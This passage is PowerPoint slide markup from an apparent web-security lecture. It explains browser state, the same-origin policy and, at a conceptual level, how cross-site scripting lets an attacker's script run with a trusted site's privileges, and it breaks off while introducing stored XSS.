              <a:rPr sz="1976" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-13" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(local state)</a:t>
            </a:r>
            <a:endParaRPr sz="1976" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="529908" indent="-262095">
              <a:spcBef>
                <a:spcPts val="845"/>
              </a:spcBef>
              <a:buSzPct val="125316"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="529908" algn="l"/>
                <a:tab pos="530225" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1976" spc="3" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-3" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>storage</a:t>
            </a:r>
            <a:endParaRPr sz="1976" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="529908" indent="-262095">
              <a:spcBef>
                <a:spcPts val="848"/>
              </a:spcBef>
              <a:buSzPct val="125316"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="529908" algn="l"/>
                <a:tab pos="530225" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1976" spc="3" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-3" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tree</a:t>
            </a:r>
            <a:endParaRPr sz="1976" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="529908" indent="-262095">
              <a:spcBef>
                <a:spcPts val="845"/>
              </a:spcBef>
              <a:buSzPct val="125316"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="529908" algn="l"/>
                <a:tab pos="530225" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1976" spc="18" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-3" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>namespace</a:t>
            </a:r>
            <a:endParaRPr sz="1976" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="529908" indent="-262095">
              <a:spcBef>
                <a:spcPts val="845"/>
              </a:spcBef>
              <a:buSzPct val="125316"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="529908" algn="l"/>
                <a:tab pos="530225" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1976" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Permission </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-13" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hardware </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>camera </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="18" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-18" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-63" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GPS)</a:t>
            </a:r>
            <a:endParaRPr sz="1976" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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4D3348-3241-EF49-80B3-EC5962491C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="0"/>
            <a:ext cx="9906000" cy="7010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0531" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F586AA6D-3883-D746-ADCC-87DB62B411C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2959100"/>
            <a:ext cx="70866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8382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6000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-site  scripting (XSS)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D8B11B7-1070-2A47-B9F2-33BB6A5F3333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="919163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="41203" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5900" spc="-229" dirty="0"/>
              <a:t>XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="60" dirty="0"/>
              <a:t>Subverting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="15" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="140" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="-195" dirty="0"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:endParaRPr sz="5900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5ADB753-12C7-FE49-9267-8F232C091577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="231457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66268B2D-2569-EE48-89D4-8313D718830D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2254250"/>
            <a:ext cx="7596188" cy="428625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-949" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>provides </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED40A7E-3716-6649-A92C-68324EA4283F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="315277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51558" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7571F42F-D808-584B-AFD2-913569A02D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="3079750"/>
            <a:ext cx="73882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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tricks the user’s browser into believing that the  script’s origin is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2700" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EFB7A6A-619B-2B48-80C6-5AE092EA526D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="415448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220FBC39-65BF-7145-9748-DD0E9D33175C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="4095750"/>
            <a:ext cx="6453188" cy="4286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Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>privileges</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AFCC5C7-1650-174A-B19D-644D602AF850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4992688"/>
            <a:ext cx="150812" cy="317500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="300"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BB5FF4D3-5AA5-F44A-98FF-B911114FBF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="4940300"/>
            <a:ext cx="3509963" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>general</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>approach:</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB42A71B-63E9-BB4A-B9B4-3AE828233F91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5545138"/>
            <a:ext cx="152400" cy="319087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="300" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B665E315-FC24-BC4C-AA2F-5454417B638C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6500813"/>
            <a:ext cx="152400" cy="319087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="300" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151565" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81431720-6FDB-2D42-94E4-B70AB0ED3E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1435100" y="5476875"/>
            <a:ext cx="7507288"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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get server of interest (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) to actually send  the attacker’s script to the user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Will pass SOP because it’s from the right origin!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C4E8762-C695-C347-9928-E30A53D0EA9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1232903" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-265" dirty="0"/>
              <a:t>Two </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="85" dirty="0"/>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="130" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-325" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8619FDE3-9B43-FD4B-B698-7894E0BD981A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2562225"/>
            <a:ext cx="8532812" cy="2687638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="505207" indent="-492527" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="505207" algn="l"/>
                <a:tab pos="505839" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“persistent”) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="581275" lvl="1" indent="-225664" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1224"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="73913"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="581910" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
